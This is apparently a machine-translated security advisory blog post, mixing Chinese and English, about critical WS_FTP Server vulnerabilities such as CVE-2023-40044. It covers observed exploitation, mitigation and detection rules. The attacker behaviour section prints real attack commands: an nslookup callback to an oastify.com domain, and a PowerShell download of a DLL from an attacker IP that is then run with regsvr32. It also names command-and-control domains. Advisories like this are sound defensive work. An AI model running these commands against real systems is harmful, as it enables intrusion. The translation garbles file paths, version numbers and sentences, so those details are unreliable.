WS_FTP服务器中的关键漏洞

最后更新于2024年2月27日星期二17:16:38 GMT

On September 27, 2023, Progress Software发布了一份关于多个漏洞影响的安全咨询 WS_FTP Server, a secure file transfer solution. 该通知中存在许多漏洞, 其中两个是关键漏洞(CVE-2023-40044和CVE-2023-42657). 我们的研究小组已经确定了似乎是 .. NET反序列化漏洞(CVE-2023-40044)，并确认可以通过单个HTTPS POST请求和预先存在的漏洞利用该漏洞 ysoserial.net gadget.

Note: 截至9月30日，Rapid7已经观察到多个利用WS_FTP的实例. We detail this activity in the Observed Attacker Behavior section of this blog.

报告中的漏洞涵盖了一系列受影响的版本, 其中一些只影响启用了Ad Hoc传输模块的WS_FTP服务器. 然而，Progress Software的建议敦促所有客户更新到WS_FTP Server 8.8.2，即软件的最新版本. Rapid7响应了这一建议. 供应商咨询有关于升级的指导, 以及禁用或删除Ad Hoc传输模块的信息.

关键漏洞如下-特别是NVD分数 CVE-2023-40044 仅作为“高”的严重程度，而不是危急的:

• CVE-2023-40044: 在WS_FTP服务器版本8之前.7.4 and 8.8.2、Ad Hoc Transfer模块存在安全漏洞 .NET反序列化漏洞，允许未经身份验证的攻击者在底层WS_FTP服务器操作系统上执行远程命令. 该漏洞影响WS_FTP服务器Ad Hoc模块的所有版本. Progress Software的建议指出，没有安装Ad Hoc传输模块的WS_FTP服务器不容易受到CVE-2023-40044的攻击.
  
• CVE-2023-42657: WS_FTP服务器版本在8之前.7.4 and 8.8.2 .易受目录遍历漏洞的攻击，该漏洞允许攻击者执行文件操作(删除, rename, rmdir, 在其授权的WS_FTP文件夹路径之外的文件和文件夹上. 攻击者还可以转义WS_FTP Server文件结构的上下文，并执行相同级别的操作(删除, rename, rmdir, Mkdir)在底层操作系统上的文件和文件夹位置.

下面列出了其他(非关键)漏洞. See Progress Software’s advisory for full details:

• CVE-2023-40045: 在WS_FTP服务器版本8之前.7.4 and 8.8.2、Ad Hoc Transfer模块容易受到跨站点脚本(XSS)的攻击. 特定有效负载的交付可能允许攻击者在受害者浏览器的上下文中执行恶意JavaScript.
• CVE-2023-40046: 在版本8之前的WS_FTP Server管理器界面.7.4 and 8.8.2 is vulnerable to  SQL injection, 这可能允许攻击者推断有关数据库的结构和内容的信息，并执行更改或删除数据库元素的SQL语句.
• CVE-2023-40047: 在版本8之前的WS_FTP服务器管理模块.8.2容易受到存储跨站点脚本(XSS)的攻击, 这可能允许具有管理权限的攻击者导入包含跨站点脚本有效负载的恶意属性的SSL证书.  成功存储跨站点脚本负载之后, 攻击者可以利用此漏洞使用专门的有效负载来攻击WS_FTP服务器管理员，从而在受害者的浏览器上下文中执行恶意JavaScript.  
• CVE-2023-40048: WS_FTP Server 8之前版本中的Manager界面.8.在与WS_FTP服务器管理功能相对应的POST事务上缺少跨站点请求伪造(CSRF)保护.
• CVE-2023-40049: 在WS_FTP服务器版本8之前.8.2，未经身份验证的用户可以枚举'WebServiceHost'目录列表下的文件.  
• CVE-2022-27665: WS_FTP Server 8.6.0容易受到XSS的反射(通过AngularJS沙盒转义表达式), 它允许攻击者通过在子目录搜索栏或添加文件夹文件名框中输入恶意有效载荷来执行客户端命令. For example, 有客户端模板注入通过subFolderPath到ThinClient/WtmApiService.asmx/GetFileSubTree URI.

Observed Attacker Behavior

在9月30日晚上, 2023, Rapid7在多个客户环境中观察到一个或多个最近披露的WS_FTP漏洞被利用的情况. 我们的团队响应的单个警报在2023-10-01 01:38:43 UTC和01:41:38 UTC之间的几分钟内发生.

流程执行链在所有观察到的实例中看起来是相同的，这表明 possible 大规模利用脆弱的WS_FTP服务器. Additionally, 我们的MDR团队观察到在所有事件中使用了相同的Burpsuite域, 这可能表明我们所看到的活动背后有一个单一的威胁行为者.

Great-grandparent Process:
C:\Windows\SysWOW64\inetsrv\w3wp.exe -ap "WSFTPSVR_WTM" -v "v4.0" -l "webengine4.dll" -a \\.\pipe\iisipm18823d36-4194- 405b -cea0f4389a0c -h "C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config" -w "" -m 1 -t 20 -ta 0

Grandparent Process:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.C:\Windows\Microsoft . exe" /noconfig /fullpaths @.NET\Framework\v4.0.30319\Temporary ASP.网络文件\出去\ e514712b \ a2ab2de1 \ ryvjavth.cmdline

Parent Process:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.. exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\TEMP\RES6C8F . exe.tmp" "c:\Windows\Microsoft.NET\Framework\v4.0.30319\Temporary ASP.网络文件\出去\ e514712b \ a2ab2de1 \ CSCCEF3EFC08A254FF1848B4D8FBBA6D0CE.TMP

Child Process:
C:\Windows\System32\cmd.exe" /c cmd.. exe /C nslookup 2adc9m0bc70noboyvgt357r5gwmnady2.oastify.com

Rapid7托管服务还观察到以下攻击链:

Great-grandparent Process:
C:\WINDOWS\SysWOW64\inetsrv\w3wp.exe -ap "WSFTPSVR_WTM" -v "v4.0" -l "webengine4.dll" -a \\.\pipe\iisipme6a8a618-bb7f-470c- 929e9 -58204f6ffcfa -h "C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config" -w "" -m 1 -t 20 -ta 0

Grandparent Process:
C:\Windows\System32\cmd.“/c powershell /c”IWR http://172.245.213[.[135:3389/bcrypt -OutFile c:\users\public\NTUSER ..dll

Parent Process:
powershell /c "IWR http://172.245.213[.[135:3389/bcrypt -OutFile c:\users\public\NTUSER ..dll

Child Process:
C:\Windows\System32\cmd./c regsvr32 c:\users\public\NTUSER . exe.dll

Upon execution, NTUSER.dll 联系了Cloudflare的工作人员 status.backendapi-fe4[.]workers[.]dev which drops an additional file, stage2.zip, into memory. Stage2.zip文件中包含另一个可执行文件，它似乎正在使用Golang并与域通信 realtime-v1[.]backendapi-fe4[.]workers[.]dev. Analysis of NTUSER.dll 确定它与silver开发后框架相关联.

Mitigation guidance

软件安全咨询受到了越来越多的审查，并引起了媒体的广泛关注, users, 以及自2023年5月Cl0p勒索软件组织以来的安全社区 attack on MOVEit Transfer. 安全文件传输技术更普遍地继续成为研究人员和攻击者的热门目标.

自9月30日以来，WS_FTP服务器一直处于活跃状态, 我们建议在紧急情况下更新到固定版本, 无需等待典型的补丁周期发生. As noted in the advisory, 使用完整的安装程序升级到补丁版本是修复此问题的唯一方法. 当升级运行时，系统将会中断."

最理想的做法是升级到8.8.2 as the vendor has advised. 如果您正在使用WS_FTP Server中的Ad Hoc传输模块，并且无法更新到固定版本, 请考虑禁用或移除该模块.

See Progress Software's advisory for the latest information.

Rapid7 customers

运行WS_FTP的InsightVM和expose客户可以在今天(9月29日)发布的内容中使用经过验证的漏洞检查来评估本博客中所有8个cve的暴露情况.

通过Rapid7扩展的检测规则库，insighttidr和Managed Detection and Response客户已经拥有了现有的检测覆盖范围. 部署了以下检测规则，并对与WS_FTP服务器利用相关的活动进行警报:

• 可疑进程- WS_FTP服务器进程生成CMD子进程
• Webshell - IIS生成CMD生成PowerShell
• Webshell - IIS Spawns PowerShell
• Webshell -由Webserver启动的命令
• 可疑进程-命令行中与Burpsuite相关的域

Velociraptor has an artifact 以检测与IIS日志中潜在的WS_FTP利用相关的字符串.

Updates

September 30: 更新说明:Rapid7正在观察野外WS_FTP利用的多个实例，而Velociraptor有一个可用的工件来协助威胁狩猎. 截至周五晚上，CVE-2023-40044的概念验证漏洞代码也已公开, September 29. 发现CVE-2023-40044的Assetnote有一篇完整的文章 here as of September 30.

October 1: 更新了Rapid7管理服务观察到的第二个攻击链的详细信息.

October 2: 更新为Rapid7 MDR和insighttidr客户指定WS_FTP服务器利用的检测规则.